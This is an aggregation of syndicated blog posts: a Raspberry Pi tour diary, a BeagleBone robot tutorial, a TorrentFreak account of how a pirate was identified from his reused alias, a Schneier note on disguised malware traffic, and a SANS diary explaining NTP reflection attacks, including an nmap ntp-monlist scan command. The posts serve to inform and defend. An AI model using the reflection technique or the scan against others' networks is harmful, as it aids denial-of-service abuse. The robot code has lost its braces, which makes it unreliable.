I left Hays for Denver, which meant I had a good 5+ hour drive ahead – all along that same freeway – the I-70, to arrive at denhac, the Denver Hackspace for 4pm. I’d also arranged late the night before to visit another Denver hackspace afterwards, so I said I’d be there at 7pm. On my way in to Denver I noticed a great change in weather – and saw lots of dark grey and black clouds ahead – and as I got closer I entered some rough winds and even witnessed a dust storm, where dust from the soil and crops of the fields was swept in to the air. It was surreal to drive through!


I worked out later that the distance I’d travelled that day was roughly equivalent to driving from Southampton to Inverness! The longest I’ve driven before is Southport to Cambridge!

I arrived just on time and was greeted by Sean, who had invited me. He introduced me to the members, all sitting around their laptop screens, and was given a tour of the space. He was telling me how the price of the space had been rising recently due to the new demand for warehouse space such as theirs for growing cannabis, now that it is legal in Colorado. I took some pictures of cool stuff around the space, including a Pibow-encased Pi powering a 3D printer. I even got to try on Sean’s Google Glass (I think Cardboard is much better).

To Grace Hopper, you will always be grasshopper

To Grace Hopper, you will always be grasshopper


One of the neatest Pi cases I've ever seen

One of the neatest Pi cases I’ve ever seen

I met a young girl, about 12 years old, who told me she recently went in to an electronics shop saying she wanted to buy a Raspberry Pi for a new project, and the member of staff she spoke to had never heard of a Raspberry Pi and assumed she wanted to cook one. Anyway, I gave her one of mine – she was delighted and immediately announced it in the networked Minecraft game she was hosting. I gave my talk in their classroom (great to see a classroom in a hackspace) before heading to my next stop – TinkerMill.

TinkerMill is a large hackspace, coworking space and startup accelerator in Denver. On arrival a group of people were sitting ready for my talk, so I got set up and was introduced by Dan, who runs the space and works out of it. The hackspace version of my talk includes more technical detail and updates on our engineering efforts. This went down well with the group and after answering a few questions we broke out in to chat when we discussed the Pi’s possibilities and what great things have come out of the educational mission.


I found a Mini Me

I found a Mini Me

I also met a woman called Megg who was standing at the back of the room, I got chatting to her and she asked me a few questions. She hadn’t attended the event but just came to use the laser cutter for the evening, and caught the end of the talk. She kept asking me questions about the Pi, and in answering them I basically gave the talk again. She said the reason she’d not come to the talk was that she was looking to use the Arduino in some future projects because she assumed it would be easier than using a Pi, based on the fact she’d heard you could do more with a Pi, so it must be more complex. I explained the difference to her hoping this would shed light on how the Pi might be useful to her after all, and that she would be able to choose a suitable and appropriate tool or language on the Pi, which is not an option with Arduino. She also discussed ideas for creative projects and wearables which were really interesting and I told her all about Rachel’s project Zoe Star and put her in touch with Rachel, Charlotte and Amy. Dan took Meg and me out to dinner and we had a great time.

Mon 18 – Boulder, Colorado

Dan offered to put me up and show me around Denver the following day – I’d originally planned to get straight off to Utah the next day but it made sense to have an extra day in Denver – I’m glad I did as I really enjoyed the town and got to have a great chilled out day before driving again. We drove up one of the nearby mountains to a height of almost 10,000 feet.


Mountain selfie

Mountain selfie

I wandered around Boulder, a wonderful town full of cafes, restaurants and interesting shops. I ended up buying most of my awful souvenirs there – including a three-tiered monkey statue for Liz:

And you are a monkey too

We ate at a restaurant called Fork so it seemed appropriate to get a picture for my Git/GitHub advocacy!



Colorado seemed to be the most recognisable state in all the places I visited, by which I mean it was culturally closest to Britain. My accent didn’t seem too far from theirs, either. A really nice place with great food and culture, with mountains and rivers right on hand. I could live in a place like that!


Tue 19 – Provo, Utah

I left Dan’s in the morning and headed West along the I-70 again. After a couple of bathroom breaks I got on some McDonald’s WiFi and checked my email and twitter – I’d had a tweet asking if I would be up for speaking in Provo that night. I thought “why not?” and said yes – expecting to arrive by 7pm, I suggested they make it 8pm just in case. I was actually heading to Provo already, in hope of meeting up with some family friends, Ken and Gary, who I stayed with last time I visited Utah. I hadn’t managed to get hold of them yet, but I kept ringing every now and then to see if they were around. When I finally got hold of them, they asked if they could come to see my presentation – so I told them where it was and said I’d see them there.

As I entered Utah the scenery got more and more beautiful – I pulled up a few times to get pictures. The moment I passed the ‘Welcome to Utah’ sign I realised what a huge feat I’d accomplished, and as I started to see signs to Salt Lake City – my end point – I was overjoyed. I hadn’t covered much distance across the country in my first week, as I’d gone South, along a bit, North and East a bit before finally setting off from St. Louis in the direction of the West Coast, so finally starting to see the blue dot on my map look a lot closer to California meant a lot.



I arrived in Provo about 7.30, located the venue, the Provo Web Academy, and by the time I found the right place and parked up it was 8pm. I was greeted by the event organiser, Derek, and my friends Ken and Gary! I hadn’t seen them for 13 years so it was a pleasure to meet again. I set up my presentation and gave my talk, had some great questions and inspired the group of about 20 (not bad, to say it had been organised just a few hours earlier) to make cool things with Pi and teach others to do the same. I went out to eat with Ken and Gary and caught up with them.

Wed 20 – Logan, Utah

The next day I had my talk planned for 4pm in Logan (North of Salt Lake City) so I had all morning free to spend with Ken (retired) while Gary was at work. Back story: my Mum (a primary school teacher) spent a year at a school in Utah in 1983-84 on an exchange programme. Ken was a fellow teacher at the school, and like many others, including families of the kids she taught, she kept in touch with him. As I said, we visited in 2001 while on a family holiday, and stayed with them on their farm. So Ken and I went to the school – obviously many of the staff there knew Ken as he only recently retired, and he told them all about my Mum and that I was touring America and wanted to visit the school. None of the teachers there were around in 1984, but some of the older ones remembered hearing about the English teachers who came that year. I took photos of the school and my Mum’s old classroom and sent them to her. We visited another teacher from that time who knew all about me from my Mum’s Christmas letter (yikes!) and even went to see the trailer my Mum lived in for the year!


I then left Provo for Logan, where the talk was to take place at Utah State University. I’d prepared a talk for university students, really, but discovered there was a large proportion of children there from a makers group for getting kids in to tech hardware projects – but they seemed to follow along and get some inspiration from the project ideas. Down to my last two Pis, I did what I did at most events and called out for the youngest people in the room – these went to 5 and 7 year olds, and my demo Babbage (I mention Dave Akerman’s Space Babbage in all my talks) was given out to a family too.


My final talk was recorded, but they told me they were recording the other screen so I’m out of the frame in most of the video.

Happy to have completed the tour, sad for my journey to be coming to and end, but glad to be able to sit down and take a breather, I chilled out for a while before heading back to Provo for my final night in America. I thought at one point I wouldn’t make it back as I hit a storm on my way home, and could barely see the road in front of me due to the incredible rain. The entire 4-lane freeway slowing to 40mph with high beams glaring, catching a glimpse of the white lines now and then and correcting the wheel accordingly, I made it home safely to join Ken and Gary for dinner.

Ken, me, Gary

Ken, me, Gary

Thu 21 – Salt Lake City, Utah

I bid farewell and left for the airport, returned my hire car with 4272 miles on it – which was 10% of the car’s overall mileage!


I flew from Salt Lake City to New York and stupidly forgot to tell them that wasn’t my final destination so I had to retrieve my suitcases at JFK baggage claim and check them back in for my next flight – because, you know, I like stress. Luckily I had no problems despite the internal flight running late and me not having a boarding card for my second flight (I had no access to a printer or WiFi in the 24 hours before the flight!), my luggage and all was successfully transported back to London with me. I was driven back to Cambridge, then up to Sheffield where I bought a suit, had my hair cut and attended the wedding of two great friends – Congratulations, Lauren and Dave.

Lauren and Dave

Lauren and Dave

What did I learn?

  • Despite sales of Pis in America being the biggest in the world, the community is far less developed than it is in the UK and in other parts of Europe. There are hardly any Jams or user groups, but there is plenty of interest!
  • American teachers want (and need) Picademy – or some equivalent training for using Pis in the classroom.
  • There is a perception that Raspberry Pi is not big in America (due to lack of community), and assumption Pis are hard to buy in America. While this is still true in many hardware stores (though people should bug stores not selling Pi and accessories to start stocking stuff!), I refer people to Amazon, Adafruit and our main distributors Element14 and RS Components. You can also buy them off the shelf at Radioshack.
  • If you build it, they will come. Announcing that I would turn up to a hackspace on a particular day brought people from all walks of life together to talk about Raspberry Pi, in much the same way a Raspberry Jam does in the UK. I could stand in front of these people and make them realise there is a community – they’re sitting in the middle of it. All they need is a reason to meet up – a Jam, a talks night, an event, a hack day, a tech club. It’s so easy to get something started, and you don’t need to start big – just get a venue and some space, tell people to turn up with Pis and take it from there.

Huge thanks to all the event organisers, the people who put me up for the night or took me out for a meal, and everyone involved in this trip. Sorry if I didn’t make it to you this time around – but I have a map and list of places we’re required – so we hope to cover more ground in future.

You can view the last iteration of my talk slides at slideshare.

Linux How-Tos and Linux Tutorials: How to Control a 3 Wheel Robot from a Tablet With BeagleBone Black

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Ben Martin. Original post: at Linux How-Tos and Linux Tutorials

terrytee pantiltGive the BeagleBone Black its own wheels, completely untether any cables from the whole thing and control the robot from a tablet.

The 3 Wheel Robot kit includes all the structural material required to create a robot base. To the robot base you have to add two gearmotors, batteries, and some way to control it. Leaving the motors out of the 3 wheel kit allows you to choose the motor with a torque and RPM suitable for your application.

In this article we’ll use the Web server on the BeagleBone Black and some Bonescript to allow simple robot control from any tablet. No ‘apps’ required. Bonescript is a nodejs environment which comes with the BeagleBone Black.

Shown in the image at left is the 3 wheel robot base with an added pan and tilt mechanism. All items above the long black line and all batteries, electronics, cabling, and the two gearmotors were additions to the base. Once you can control the base using the BeagleBone Black, adding other hardware is relatively easy.

This article uses two 45 rpm Precision Gear Motors. The wheels are 6 inches in diameter so the robot will be speed-limited to about 86 feet per minute (26 meter/min). These motors can run from 6-12 volts and draw a maximum stall current draw of 1 amp. The large stall current draw will happen when the motor is trying to turn but is unable to. For example, if the robot has run into a wall and the tires do not slip. It is a good idea to detect cases that draw stall current and turn off power to avoid overheating and/or damaging the motor.

In this series on the BeagleBone Black we have also seen how to use the Linux interface allowing us to access chips over SPI and receive interrupts when the voltage on a pin changes, and how to drive servo motors.

Constructing the 3 Wheel Robot

3 wheel robot kit parts

The parts for the 3 Wheel Robot kit are shown above (with the two gearmotors in addition to the raw kit). You can assemble the robot base in any order you choose. A fair number of the parts are used, together with whichever motors you selected, to mount the two powered front wheels. The two pieces of channel are connected using the hub spacer and the swivel hub is used to connect the shorter piece of channel at an angle at the rear of the robot. I’m assuming the two driving wheels are at the ‘front’. I started construction at the two drive wheels as that used up a hub adapter, screw hub, and two motor mount pieces. Taking those parts out of the mix left less clutter for the subsequent choice of pieces.terry in construction

Powering Everything

In a past article I covered how the BeagleBone Black wanted about 2.5 into the low 3 Watts of power to operate. The power requirements for the BeagleBone Black can be met in many ways. I chose to use a single 3.7-Volt 18650 lithium battery and a 5 V step up board. The BeagleBone Black has a power jack expecting 5 V. At a high CPU load the BeagleBone Black could take up to 3.5 W of power. So the battery and step up converter have to be comfortable supplying a 5V/700mA power supply. The battery is rated at about 3 amp-hours so the BeagleBone Black should be able to run for hours on a single charge.

The gearmotors for the wheels can operate on 6 to 12 V. I used a second battery source for the motors so that they wouldn’t interfere with the power of the BeagleBone Black. For the motors I used a block if 8 NiMH rechargeable AA batteries. This only offered around 9.5 V so the gearmotors would not achieve their maximum performance but it was a cheap supply to get going. I have manually avoided stalling either motor in testing so as not to attempt to draw too much power from the AA batteries. Some stall protection to cut power to the gearmotors and protect the batteries should be used or a more expensive motor battery source. For example, monitoring current and turning off the motors if they attempt to draw too much.

The motor power supply was connected to the H-bridge board. Making the ground terminal on the H-bridge a convenient location for a common ground connection to the BeagleBone Black.

Communicating without Wires

The BeagleBone Black does not have on-board wifi. One way to allow easy communication with the BeagleBone Black is to flash a TP-Link WR-703N with openWRT and use that to provide a wifi access point for access to the BeagleBone Black. The WR-703N is mounted to the robot base and is connected to the ethernet port of the BeagleBone Black. The tablets and laptops can then connect to the access point offered by the onboard WR-703N.

I found it convenient to setup the WR-703N to be a DHCP server and to assign the same IP address to the BeagleBone Black as it would have obtained when connected to my wired network. This way the tablet can communicate with the robot both in a wired prototyping setup and when the robot is untethered.

Controlling Gearmotors from the BeagleBone Black

Unlike the servo motors discussed in the previous article, gearmotors do not have the same Pulse Width Modulation (PWM) control line to set at an angle to rotate to. There is only power and ground to connect. If you connect the gearmotor directly to a 12 V power source it will spin up to turn as fast as it can. To turn the gearmotor a little bit slower, say at 70 percent of its maximum speed, you need to supply power only 70 percent of the time. So we are wanting to perform PWM on the power supply wire to the gearmotor. Unlike the PWM used to control the servo we do not have any fixed 20 millisecond time slots forced on us. We can divide up time any way we want, for example running full power for 0.7 seconds then no power for 0.3 s. Though a shorter time slice than 1 s will produce a smoother motion.

An H-Bridge chip is useful to be able to switch a high voltage, high current wire on and off from a 3.3 V wire connected to the BeagleBone Black. A single H-Bridge will let you control one gearmotor. Some chips like the L298 contain two H-Bridges. This is because two H-Bridges are useful if you want to control some stepper motors. A board containing an L298, heatsink and connection terminals can be had for as little as $5 from a China based shop, up to more than $30 for a fully populated configuration made in Canada that includes resistors to allow you to monitor the current being drawn by each motor.

The L298 has two pins to control the configuration of the H-Bridge and an enable pin. With the two control pins you can configure the H-Bridge to flow power through the motor in either direction. So you can turn the motor forwards and backwards depending on which of the two control pins is set high. When the enable pin is high then power flows from the motor batteries through the motor in the direction that the H-Bridge is configured for. The enable pin is where to use PWM in order to turn the motors at a rate slower than their top speed.

The two control lines and the enable line allow you to control one H-Bridge and thus one gearmotor. The L298 has a second set of enable and control lines so you can control a second gearmotor. Other than those lines the BeagleBone Black has to connect ground and 3.3 V to the H-Bridge.

When I first tried to run the robot in a straight line I found that it gradually turned left. After some experimenting I found that at full power the left motor was rotating at a slightly slower RPM relative to the right one. I’m not sure where this difference was being introduced but having found it early in the testing the software was designed to allow such callibration to be performed behind the scenes. You select 100 percent speed straight ahead and the software runs the right motor at only 97 percent power (or whatever callibration adjustment is currently applied).

To allow simple control of the two motors I used two concepts: the speed (0-100) and heading (0-100). A heading of 50 means that the robot should progress straight ahead. This mimics a car interface where steering (heading) and velocity are adjusted and the robot takes care of the details.

I have made the full source code available on github. Note the branch which is frozen in time at the point of the article. The master branch contains some new goodies and a few changes to the code structure, too.

The Server

Because the robot base was “T” shaped, over time it was referred to as TerryTee. The TerryTee nodejs class uses bonescript to control the PWM for the two gearmotors.

The constructor takes the pin identifier to use for the left and right motor PWM signals and a reduction to apply to each motor, with 1.0 being no reduction and 0.95 being to run the motor at only 95 percent the specified speed. The reduction is there so you can compensate if one motor runs slightly slower than the other.

function TerryTee( leftPWMpin, rightPWMpin, leftReduction, rightReduction )
    TerryTee.running = 1;
    TerryTee.leftPWMpin = leftPWMpin;
    TerryTee.rightPWMpin = rightPWMpin;
    TerryTee.leftReduction = leftReduction;
    TerryTee.rightReduction = rightReduction;
    TerryTee.speed = 0;
    TerryTee.heading = 50;

The setPWM() method shown below is the lowest level one in TerryTee, and other methods use it to change the speed of each motor. The PWMpin selects which motor to control and the ‘perc’ is the percentage of time that motor should be powered. I also made perc able to be from 0-100 as well as from 0.0 – 1.0 so the web interface could deal in whole numbers.

When an emergency stop is active, running is false so setPWM will not change the current signal. The setPWM also applies the motor strength callibration automatically so higher level code doesn’t need to be concerned with that. As the analogWrite() Bonescript call uses the underlying PWM hardware to output the signal, the PWM does not need to be constantly refreshed from software, once you set 70 percent then the robot motor will continue to try to rotate at that speed until you tell it otherwise.

TerryTee.prototype.setPWM = function (PWMpin,perc) 
    if( !TerryTee.running )
    if( PWMpin == TerryTee.leftPWMpin ) {
	perc *= TerryTee.leftReduction;
    } else {
	perc *= TerryTee.rightReduction;
    if( perc >  1 )   
	perc /= 100;
    console.log("awrite PWMpin:" + PWMpin + " perc:" + perc  );
    b.analogWrite( PWMpin, perc, 2000 );

The setSpeed() call takes the current heading into consideration and updates the PWM signal for each wheel to reflect the heading and speed you have currently set.

TerryTee.prototype.setSpeed = function ( v ) 
    if( !TerryTee.running )
    if( v < 40 )
	TerryTee.speed = 0;
	this.setPWM( TerryTee.leftPWMpin,  0 );
	this.setPWM( TerryTee.rightPWMpin, 0 );
    var leftv  = v;
    var rightv = v;
    var heading = TerryTee.heading;
    if( heading > 50 )
	if( heading >= 95 )
	    leftv = 0;
	    leftv *= 1 - (heading-50)/50;
    if( heading < 50 )
	if( heading <= 5 )
	    rightv = 0;
	    rightv *= 1 - (50-heading)/50;
    console.log("setSpeed v:" + v + " leftv:" + leftv + " rightv:" + rightv );
    this.setPWM( TerryTee.leftPWMpin,  leftv );
    this.setPWM( TerryTee.rightPWMpin, rightv );
    TerryTee.speed = v;

The server itself creates a TerryTee object and then offers a Web socket to control that Terry. The ‘stop’ message is intended as an emergency stop which forces Terry to stop moving and ignore input for a period of time so that you can get to it and disable the power in case something has gone wrong.

var terry = new TerryTee('P8_46', 'P8_45', 1.0, 0.97 );
terry.setSpeed( 0 );
terry.setHeading( 50 );
b.pinMode     ('P8_37', b.OUTPUT);
b.pinMode     ('P8_38', b.OUTPUT);
b.pinMode     ('P8_39', b.OUTPUT);
b.pinMode     ('P8_40', b.OUTPUT);
b.digitalWrite('P8_37', b.HIGH);
b.digitalWrite('P8_38', b.HIGH);
b.digitalWrite('P8_39', b.LOW);
b.digitalWrite('P8_40', b.LOW);
io.sockets.on('connection', function (socket) {
  socket.on('stop', function (v) {
      terry.setSpeed( 0 );
      terry.setHeading( 0 );
  socket.on('speed', function (v) {
      console.log('set speed to ', v );
      console.log('set speed to ', v.value );
      if( typeof v.value === 'undefined')
      terry.setSpeed( v.value );

The code on github is likely to evolve over time to move the various fixed cutoff numbers to be configurable and allow Terry to be reversed from the tablet.

The Client (Web page)

To quickly create a Web interface I used Bootstrap and jQuery. If the interface became more advanced then perhaps something like AngularJS would be a better fit. To control the speed and heading with an easy touch interface I also used the bootstrap-slider project.BeagleBone robot web interface

<div class="inner cover">
  <div class="row">
    <div class="col-md-1"><p class="lead">Speed</p></div>
    <div class="col-md-8"><input id="speed" data-slider-id='speedSlider' 
                    type="text" data-slider-min="0" data-slider-max="100" 
                    data-slider-step="1" data-slider-value="0"/></div>
  <div class="row">
    <div class="col-md-1"><p class="lead">Heading</p></div>
    <div class="col-md-8"><input id="heading" data-slider-id='headingSlider' 
                    type="text" data-slider-min="0" data-slider-max="100" 
                    data-slider-step="1" data-slider-value="50"/></div>
<div class="inner cover">
    <div class="btn-group">
	<button id="rotateleft" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-hand-left"></span>&nbsp;Rot&nbsp;Left</button>
	<button id="straightahead" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-arrow-up"></span>&nbsp;Straight&nbsp;ahead</button>
	<button id="rotateright" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-hand-right"></span>&nbsp;Rot&nbsp;Right</button>

With those UI elements the hook up to the server is completed using io.connect() to connect a ‘var socket’ back to the BeagleBone Black. The below code sends commands back to the BeagleBone Black as UI elements are adjusted on the page. The rotateleft command is simulated by setting the heading and speed for a few seconds and then stopping everything.

$("#speed").on('slide', function(slideEvt) {
    socket.emit('speed', {
        value: slideEvt.value[0],
        '/end': 'of-message'
$('#straightahead').on('click', function (e) {
$('#rotateleft').on('click', function (e) {
     setTimeout(function() {
     }, 2000);

The BeagleBone Black runs a Web server offering files from /usr/share/bone101. I found it convenient to put the whole project in /home/xuser/webapps/terry-tee and create a softlink to the project at /usr/share/bone101/terry-tee. This way http://mybeagleip/terry-tee/index.html will load the Web interface on a tablet. Cloud9 will automatically start any Bonescript files contained in /var/lib/cloud9/autorun. So two links setup Cloud9 to both serve the client and automatically start the server Bonescript for you:

root@beaglebone:/var/lib/cloud9/autorun# ls -l
lrwxrwxrwx 1 root root 39 Apr 23 07:02 terry.js -> /home/xuser/webapps/terry-tee/server.js
root@beaglebone:/var/lib/cloud9/autorun# cd /usr/share/bone101/
root@beaglebone:/usr/share/bone101# ls -l terry-tee
lrwxrwxrwx 1 root root 29 Apr 17 05:48 terry-tee -> /home/xuser/webapps/terry-tee

Wrap up

I originally tried to use the GPIO pins P8_41 to 44. I found that if I had wires connected to those ports the BeagleBone Black would not start. I could remove and reapply the wires after startup and things would function as expected. On the other hand, leaving 41-44 unconnected and using 37-40 instead the BeagleBone Black would boot up fine. If you have a problem starting your BeagleBone Black you might be accidentally using a connector that has a reserved function during startup.

While the configuration shown in this article allows control of only the movement of the robot base the same code could easily be extended to control other aspects of the robot you are building. For example, to control an arm attached and be able to move things around from your tablet.

Using a BeagleBone Black to control the robot base gives the robot plenty of CPU performance. This opens the door to using a mounted camera with OpenCV to implement object tracking. For example, the robot can move itself around in order to keep facing you. While the configuration in this article used wifi to connect with the robot, another interesting possibility is to use 3G to connect to a robot that isn’t physically nearby.

The BeagleBone Black can create a great Web-controlled robot and the 3 wheel robot base together with some gearmotors should get you moving fairly easily. Though once you have the base moving around you may find it difficult to resist giving your robot more capabilities!

We would like to thank ServoCity for supplying the 3 wheel robot base, gearmotors, gearbox and servo used in this article.

TorrentFreak: No VPN on Earth Can Protect Careless Pirates

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

pirate-cardLast year, Philip Danks, a man from the West Midlands, UK, went into a local cinema and managed to record the movie Fast and Furious 6. He later uploaded that content to the Internet.

After pleading guilty, this week Wolverhampton Crown Court sentenced him to an unprecedented 33 months in prison.

The Federation Against Copyright Theft are no doubt extremely pleased with this result. After their successful private prosecution, the Hollywood-affiliated anti-piracy group is now able to place Danks’ head on a metaphorical pike, a clear warning to other would-be cammers. But just how difficult was this operation?

There’s often a lot of mystery attached to the investigations process in a case like this. How are individuals like Danks tracked and found? Have FACT placed spies deep into file-sharing sites? Are the authorities sniffing traffic and breaking pirates’ VPN encryption?

Or are they spending half an hour with Google and getting most of it handed to them on a plate? In Danks’ case, that appears to be exactly what happened.

Something that many millions of people use online is a nickname, and Danks was no exception. His online alias in the torrenting scene was TheCod3r, and as shown below it is clearly visible in the release title.


The idea behind aliases is that they provide a way to mask a real name. Military uses aside, adopting an alternative communications identity was something popularized in the 70s with the advent of Citizens Band radio. The practice continues online today, with many people forced to adopt one to register with various services.

However, what many in the file-sharing scene forget is that while aliases on a torrent site might be useful, they become as identifying as a real name when used elsewhere in ‘regular’ life. The screenshot below shows one of Danks’ first huge mistakes.


Clicking that link on dating site Plenty of Fish (POF) reveals a whole range of information about a person who, at the very least, uses the same online nickname as Danks. There’s no conclusive proof that it’s the same person, but several pieces of information begin to build a picture.

In his POF profile, Danks reveals his city as being Willenhall, a small town situated in an area known locally as the Black Country. What FACT would’ve known soon after the movie leaked online was which cinema it had been recorded in. That turned out to be a Showcase cinema, just a few minutes up the road from Willenhall in the town of Walsall.

Also revealed on Danks’ POF profile is his full name and age. When you have that, plus a town, you can often find a person’s address on the UK’s Electoral Register.

It’s also trivial to find social networking pages. Not only do pictures on Danks’ POF profile match those on his Facebook page, he also has a revealing movie item listed in his interests section.


Of course, none of this in itself is enough to build a decent case, but when you have the police on board as FACT did, things can be sped up somewhat. On May 23, 2013 Danks was raided and then, just two days later, he did something quite astonishing.

Posting on his Facebook page, the then 24-year-old took to his Facebook account (he has two) to mock the makers of Fast and Furious 6.

“Seven billion people and I was the first. F*** you Universal Pictures,” he wrote.

Also amazing was Danks’ apparent disregard for the predicament he was in. On May 10, 2013, Danks again took to Facebook, this time to advertise that he was selling copies of movies including Robocop and Captain America.


This continued distribution of copyrighted material particularly aggravated the Court at his sentencing hearing this week, with Danks’ behavior being described as “bold, arrogant and cocksure offending.”

While the list of events above clearly shows a catalog of errors that some might even find amusing, the desire of many pirates to utilize the same nickname across many sites is a common one employed by some of the biggest in the game.

Once these and other similar indicators migrate across into real-life identities and activities (and the ever-present Facebook account of course), joining the dots is not difficult – especially for the police and outfits like FACT. And once that happens, no amount of VPN encryption of lack of logging is going to put the genie back in the bottle.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: Disguising Exfiltrated Data

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s an interesting article on a data exfiltration technique.

What was unique about the attackers was how they disguised traffic between the malware and command-and-control servers using Google Developers and the public Domain Name System (DNS) service of Hurricane Electric, based in Fremont, Calif.

In both cases, the services were used as a kind of switching station to redirect traffic that appeared to be headed toward legitimate domains, such as,, and


The malware disguised its traffic by including forged HTTP headers of legitimate domains. FireEye identified 21 legitimate domain names used by the attackers.

In addition, the attackers signed the Kaba malware with a legitimate certificate from a group listed as the “Police Mutual Aid Association” and with an expired certificate from an organization called “MOCOMSYS INC.”

In the case of Google Developers, the attackers used the service to host code that decoded the malware traffic to determine the IP address of the real destination and edirect the traffic to that location.

Google Developers, formerly called Google Code, is the search engine’s website for software development tools, APIs, and documentation on working with Google developer products. Developers can also use the site to share code.

With Hurricane Electric, the attacker took advantage of the fact that its domain name servers were configured, so anyone could register for a free account with the company’s hosted DNS service.

The service allowed anyone to register a DNS zone, which is a distinct, contiguous portion of the domain name space in the DNS. The registrant could then create A records for the zone and point them to any IP address.

Honestly, this looks like a government exfiltration technique, although it could be evidence that the criminals are getting even more sophisticated. Linux Kernel Git Repositories Add 2-Factor Authentication (

This post was syndicated from: and was written by: ris. Original post: at takes
a look
at using 2-factor authentication for commit access to kernel
git repositories. “Having the technology available is one thing, but how to incorporate it into the kernel development process — in a way that doesn’t make developers’ lives painful and unbearable? When we asked them, it became abundantly clear that nobody wanted to type in 6-digit codes every time they needed to do a git remote operation. Where do you draw the line between security and usability in this case?

We looked at the options available in gitolite, the git repository management solution used at, and found a way that allowed us to trigger additional checks only when someone performed a write operation, such as “git push.” Since we already knew the username and the remote IP address of the developer attempting to perform a write operation, we put together a verification tool that allowed developers to temporarily whitelist their IP addresses using their 2-factor authentication token.”

SANS Internet Storm Center, InfoCON: green: Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that with no port forwarding enabled through the firewall that Internet originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason why these packets are passing the firewall is because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled the firewall would treat outbound UDP transactions as I described earlier.  When a device on your network initiates an outbound connection to a server responses from that server are permitted back into your network.  Since UDP is stateless most firewalls simulate state with a timeout.  In other words if no traffic is seen between the device and the server for 600 seconds then don’t permit any response from the server until there is new outbound traffic. But anytime related traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate. Visually that looks like:

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem since the only port exposed is the original ephemeral source port and it is waiting for a NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral port for the outbound connection,  both the source and the destination ports use 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 

Of course UDP is stateless so the source IP can be spoofed and there is no way for the receiver of the NTP request to validate the source IP or source port permitting the attacker to direct the attack against any IP and port on the Internet.  It is exceedingly difficult to trace these attacks back to the source so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of the attackers holding holding these communications open for months.  

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters then the likelihood of this sort of attack is lowered substantially.  In a nutshell anti-spoofing says that if the traffic is headed into my network and the source IP address is from my network then the source IP must be spoofed, so drop the packet.  It also works in the converse.  If a packet is leaving my network and the source IP address is not an IP address from my network then the source IP address must be spoofed, so drop the packet.
  • It can’t hurt to check your network for NTP servers.  A single nmap command will quickly confirm if any are open on your network. nmap -sU  -A -n -PN -pU:123 –script=ntp-monlist .  If you find one or more perhaps you can contact the vendor for possible resolution.
  • If you own a gateway router that implements full-cone NAT you may want to see if your gateway router implements the equivalent of  the Pace “Strict UDP Session Controlâ€�.  This will prevent an attacker from access misconfigured UDP servers on your network. 

– Rick Wanner – rwanner at isc dot sans dot edu- – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.